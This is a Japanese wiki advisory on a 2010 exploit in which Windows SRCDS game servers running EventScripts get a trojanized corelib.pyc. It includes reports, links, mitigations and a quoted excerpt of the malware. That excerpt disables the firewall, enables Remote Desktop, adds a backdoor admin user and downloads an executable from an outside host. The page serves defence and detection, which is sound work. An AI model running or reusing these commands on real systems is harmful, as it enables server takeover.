新規
編集
添付
一覧
最終更新
差分
バックアップ
凍結
複製
名前変更
ヘルプ■■:緊急:3月8日:注意喚起■■
ウィンドウズサーバーのSRCDSとESP(ES2.0)の組み合わせで起こる
セキュリティホールを利用したアカウントハックの被害が国内でも確認されました。
現在実行中のゲームサーバーのOSがウィンドウズの場合、かつESPを利用していると
このセキュリティホールが発生します。OSがLinuxの場合セキュリティホールは
発生しないと報告されています。
(すいません、時間が遅いので文面がまだまとまりませんでしたが)
以下の文章は時系列になっているんで流れを追う感じで読んでやってください。
説明が必要な場合、また明日説明します。>雑文のままですがご容赦ください
対応方法:ウィンドウズでもアドミンでログインしない>これは鯖管理人が急いで対応すべきこと
制限ユーザーで起動していれば即レジストリを弄られることはない>アカウントハックは一応防げる
可能ならばESP(ESPython)を使わない、ESC(ES1.5)にする
問題点:特定のディレクトリにファイルをアップロードされてしまう穴が塞がってない
■■メモ:緊急:3月5日■■
発生しているトラブル「Invalid login combination」についての報告。まとめ
Windows用鯖「SRCDS」とESP(ES2.0)の組み合わせで発生するセキュリティホールがあるようです。
この攻撃を受けると鯖は不正なPythonスクリプトをアップロードされてそれを実行してしまいます。
2月26日に最初の攻撃が確認され、3月2日、この不正にアップロードされたPythonスクリプトを
Decompileした内容がValve Half-Life Dedicated ServerのMailing Listで報告されています。
「Lane Eckley」の報告によると、不正にアップロードされたスクリプトはウィンドウズ鯖のアカウント
ハックを目的としたもので、Linux鯖には影響がありません。
このセキュリティホールに対するパッチおよび信頼できる日本語情報は確認できていません。
現在Googleで「Invalid login combination」で検索すると
一番上に来る「pastebin - Unnamed - post number 1820210」で当該のPythonスクリプトは詳細確認できます。
pastebinに張られているスクリプトの内容について
この情報の本来の発信元はValve Half-Life Dedicated ServerのMailing Listから「Lane Eckley」が
http://www.mail-archive.com/hlds@list.valvesoftware.com/msg41688.html
[hlds] Eventscripts - Creating Windows Account で最初に報告した物と一致しています。
この報告を受けて
http://forums.srcds.com/viewcat/53
http://forums.srcds.com/viewtopic/13843
SRCDS.com Forums » Site & News Related » Server Updates » Modification Updates
というスレッドが作成されましたが現在までに目立った進展はありません。(3月6日)
Windows鯖が実際にアカウントハックされているかどうかの目処を立てる場合、
罠が仕掛けられた当時のユーザー権限が制限されていれば=制限ユーザーであったならば
恐らくハックには失敗しています。しかし不正なスクリプトを鯖にアップロードされる穴は
埋まっていないし、「Lane Eckley」によって報告されたものと同じスクリプトがアップロード
されたかどうかは確認できない、今後アカウント権限の昇格を伴う内容のスクリプトが実行される
可能性もあるため、Windows自体にアカウント昇格などのセキュリティホールが生じた場合
これを基点にしたゼロデイ攻撃を受ける可能性もあります。
調べた結果ESのフォーラムでも「DeathRex」から2月26日に報告がありました。
(被害を受けた鯖のMDMP(エラーダンプ)と日付が一致)
http://forums.eventscripts.com/viewtopic.php?f=90&t=36658&p=329345&hilit=Invalid+login#p329345
「DeathRex」が報告した内容は以下の通り
Posted: 2010-02-26, 5:31 pm
Python initialized.
[EventScripts] Automatically loading es_corelib.txt...
Getting Paths
Invalid login combination
彼の鯖がWindowsだったかどうかは不明ですが、03月01日のPostで「FlAsHdRiVe」が同じ障害を
訴えていますが彼はウィンドウズ鯖だったことを報告しています。(「Lane Eckley」の報告の一日前)
というわけで断片的な情報からですが、セキュリティホールがある>攻撃された>corelib.pycが不正な物
にすり替えられた>この不正なcorelib.pycが実行されているため「Invalid login combination」
というエラーが出るようになった・・・と考えています。(gran_trino)
corelib.pycはPythonが生成する中間コードですが、不正なアップロードを防ぐ手段が無いらしいので
Windows用のSRCDSとESPの組み合わせはちょっと怖いと感じています。
鯖が止まれば異常と分かるから今回はある意味良かったけど。。。
corelib.pyが不正な物とすり替えられた場合、スクリプト本体は後で消去されてcorelib.pycという
Pythonのつくる中間コードだけが残されています。これはバイナリなので完全なスクリプト内容を
得たい場合はDecompilerを使えば中身を見ることができます。
今回は逆アセンブルせずにバイナリのまま中身を眺めてみましたが、「Lane Eckley」の報告した
ものと全く同じということはなく、たぶんいろんな亜種があるだろうと推測してます。
被害を受けた鯖から得たcorelib.pycの内容から
ttp://stashbox.org/806519/server.ex●の記述を見つけました。
で実際にマシンをウィルススキャンにかけたところトロイの木馬が仕込まれていることが判明しました。
■■■■■■■■■
http://ja.pastebin.ca/1820210
pastebin - Unnamed - post number 1820210
print 'Setting Up Remote Desktop'
103. os.system('REG ADD HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile /v "EnableFirewall" /t REG_DWORD /d "0" /f')
104. os.system('REG ADD "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f')
105. print 'Creating Users'
106. os.system('net user bw 313313313 /add')
107. os.system('net localgroup Administrator bw /add ')
108. os.system('net group "Domain Admins" bw /add')
109. os.system('net localgroup administrators bw /add')
110. os.system('net localgroup administrator bw /add')
111. os.system('net localgroup administratoren bw /add')
112. os.system('net localgroup administradors bw /add')
113. os.system('net localgroup administrateurs bw /add')
114. print 'Downloading'
115. url = 'ttp://stashbox.org/806008/Windows%20Host%20Process●exe'
116. save = (root + 'rawr.exe')
※サーバーを制限ユーザーで実行している場合このアカウントハックは失敗する
※stashbox.orgは海外にあるフリーのファイルアップロードサービスです
(ブラジル・アメリカからのアクセスが多い)
※"EnableFirewall" /t REG_DWORD /d "0" /f')は火壁がオフになった状態です。
レジストリからこの項目を見て1になっていない場合ハックされた可能性があります。
■■■■■■■■■■
http://www.mail-archive.com/hlds@list.valvesoftware.com/msg41688.html
[hlds] Eventscripts - Creating Windows Account
引用:
I wanted to shoot out an email to everyone in regards to an exploit we have
come across today for those who are running Eventscripts & windows based
servers.
つまりWindows鯖とESの組み合わせだとこのセキュリティホールが生じる
"corelib.pyc"が目標
引用:
We have also found there is multiple variations of this file, so you may
want to be sure you do a full look at your machines.
With that being said, the files are coming from a free web hosting account
over at t35.com - So if your machines have seen any connections in/out bound
to that host in the past 48 hours, I would highly suggest you check your
machines.
症状が出ている場合、マシンを止めてウィルスチェック
(たぶん致命傷ではないはず)だけどクリーンインストールお勧めコース・・・
Linuxだと影響は受けない
■■■■■■■■
'Half-Life dedicated Win32 server mailing list'
http://forums.srcds.com/viewcat/53
SRCDS.com Forums » Site & News Related » Server Updates » Modification Updates
進展無し
http://code.devicenull.org/index.php?title=Misc:HL2_Exploits
Tips for securing your server
http://forums.alliedmods.net/showthread.php?t=109453
AlliedModders Forum Index > SourceMod > Metamod: Source > Metamod:Source Plugins
D-FENS Plugin(すべては防げない>無いよりましとも)
http://forums.eventscripts.com/viewtopic.php?p=330735
参考:別件
